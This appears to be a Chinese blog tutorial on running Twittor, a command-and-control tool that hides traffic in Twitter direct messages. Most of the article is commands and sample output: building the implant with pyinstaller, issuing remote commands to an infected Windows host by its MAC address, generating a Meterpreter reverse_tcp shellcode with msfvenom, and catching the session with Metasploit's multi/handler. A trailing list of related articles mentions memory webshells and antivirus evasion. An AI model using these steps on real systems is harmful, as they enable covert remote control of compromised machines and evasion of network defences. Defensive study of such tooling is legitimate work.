【基础篇】————9、隐匿攻击之Twitter
社交媒体网络是公司营销团队的一个很好的工具。如果使用得当,他们往往会吸引新的业务。因此,几乎不可能将流量阻塞到Twitter和Facebook等社交媒体平台。它可以用于测试的优点是因为有各种命令和控制工具可以隐藏他们在社交媒体网络流量背后的活动。
使用Twitter的一个公知的命令和控制工具叫做Twittor。这个工具是由Paul Amar开发的,它基于Gcat的概念,它使用Gmail作为命令和控制服务器。
唯一的要求是植入物和C2服务器都需要消费者和访问令牌,这些令牌可以从Twitter应用程序管理生成。
创建新的Twitter应用程序后,将自动生成这些值。从控制器到主机的通信是通过Twitter直接消息执行的,因此新应用程序将需要读取,写入和直接消息访问。
植入物基于python,但是可以使用pyinstaller将其转换为可执行文件。应该注意,这个工具需要python 2.7。Pyinstaller可以直接从pip安装。
pip install pyinstaller
pyinstaller implant.py
一旦在目标上执行植入,Twittor将接收连接,并且将检索包括Windows构建的主机的MAC地址。
此时,Twittor能够在目标上执行命令,在内存中执行shellcode,还可以检索已在主机上执行的命令列表。
为了发送命令,Twittor使用目标的MAC地址。
$ list_bots
E0:94:67:90:22:6C: Windows-10-10.0.15063-SP0
$ !cmd E0:94:67:90:22:6C ipconfig/all
[+] Sent command "ipconfig/all" with jobid: SPVGIpE
该命令将通过Twitter上的直接消息以base-64编码格式发送给主机。
由于Twittor不使用任何加密,因此可以轻松解码直接消息。传输到目标的消息将包含以下信息:
- CMD命令
- 作业ID
- 寄件人
- 接收方MAC地址
可以使用带有关联JobID 的命令retrieve来检索命令的输出。
$ !retrieve SPVGIpE
还可以将shellcode传递给目标,以获得Meterpreter会话并利用其功能。Metasploit msfvenom可用于生成python shellcode。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XXX LPORT=4444 -f python
下面的命令将在目标上执行shellcode。
!shellcode E0:94:67:90:22:6C shellcode
以下Metasploit模块可用于接收连接。
exploit/multi/handler
参考
- https://github.com/PaulSec/twittor
【基础篇】————9、隐匿攻击之Twitter相关推荐
- Java内存马攻防实战——攻击基础篇
在红蓝对抗中,攻击方广泛应用webshell等技术在防守方提供的服务中植入后门,防守方也发展出各种技术来应对攻击,传统的落地型webshell很容易被攻击方检测和绞杀.而内存马技术则是通过在运行的 ...
- 渗透测试入门3之隐匿攻击
渗透测试入门3之隐匿攻击 1. Command and Control ICMP :https://pentestlab.blog/2017/07/28/command-and-control-icm ...
- JAVA面试八股文宝典(黑马学习随笔)-- 基础篇
学习随笔简介 跟随着黑马满老师的<Java八股文面试题视频教程,Java面试八股文宝典>学习,视频教程地址:Java八股文面试题视频教程,Java面试八股文宝典(含阿里.腾迅大厂java面 ...
- php杂谈【基础篇】之_7.PHP涉及的所有英文单词
php杂谈[基础篇]之_7.PHP涉及的所有英文单词 拦路虎 PHP再火,也会让一部同学心生畏惧,因为看到编辑器中那一串串英文单词,担心自己英文不好,从而对能学会PHP的决心产生动摇.其实大可不必,英 ...
- MySQL学习笔记-基础篇1
MySQL 学习笔记–基础篇1 目录 MySQL 学习笔记--基础篇1 1. 数据库概述与MySQL安装 1.1 数据库概述 1.1.1 为什么要使用数据库 1.2 数据库与数据库管理系统 1.2.1 ...
- React-Native之手势基础篇
好的东西都要分享,尊重原版原链接. React-Native是一款由Facebook开发并开源的框架,主要卖点是使用JavaScript编写原生的移动应用.从2015年3月份开源到现在,已经差不多有半 ...
- 【linux】循序渐进学运维-基础篇-netstat命令详解
大家好,我是高胜寒,本文是Linux运维-循序渐进学运维-基础篇的第62篇文章 文章目录 前言 一. netstat命令详解 作用 1. 常用参数 2. 命令使用 1) 参数作用详解 2) 网络连接状 ...
- 基础篇:操作系统、计算机网络、设计模式(二)(附参考答案)
二.计算机网络 1.电路交换与分组交换的区别?优劣对比 一. 电路交换: 电路交换是以电路连接为目的的交换方式,通信之前要在通信双方之间建立一条被双方独占的物理通道. 电路交换的三个阶段: (1)建立 ...
- 免杀的N种姿势-基础篇
免杀概念 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为"反-反病毒", ...
最新文章
- 功能性农业实用技术 谋定·农业大健康-李喜贵:粤黔东西协作
- dns 服务器无法从应用程序目录分区,DNS 区域不随事件 4000 和 4007 一起加载 - Windows Server | Microsoft Docs...
- HTML JS正方形轮播,js,html一个页面里面多个页面轮播
- 5、this调用语句必须是构造函数中的第一个可执行语句_ES6中的Promise和Generator详解...
- raspberry pi_尝试使用Raspberry Pi Sense HAT
- 【Flink】Flink 提交任务到yarn报错 proxy provider ConfiguredFailoverProxyProvider NetUtils.getSocketAddressS
- 【机器学习】Andrew Ng——02单变量线性回归
- 上周热点回顾(2.25-3.3)
- Java中的命名规范总结
- 知识分享 | 卡方分析的入门小知识
- HTML(简介及常用标签)
- keil编译后报错Error:L6218E的解决方法
- OpenGL with QtWidgets:练习之甜甜圈
- HMI-66-【MeterDisplay for Arm Linux】液晶仪表Arm Linxu迁移
- 关于QT跨平台和编译器的理解
- java-php-python-ssm在线影视点播系统计算机毕业设计
- Rust Trait简介
- halcon实现车牌识别
- HttpMessageNotWritableException: No converter found for return value of type,可能出现的原因及解决方法
- 美国顶尖的数学竞赛有哪些?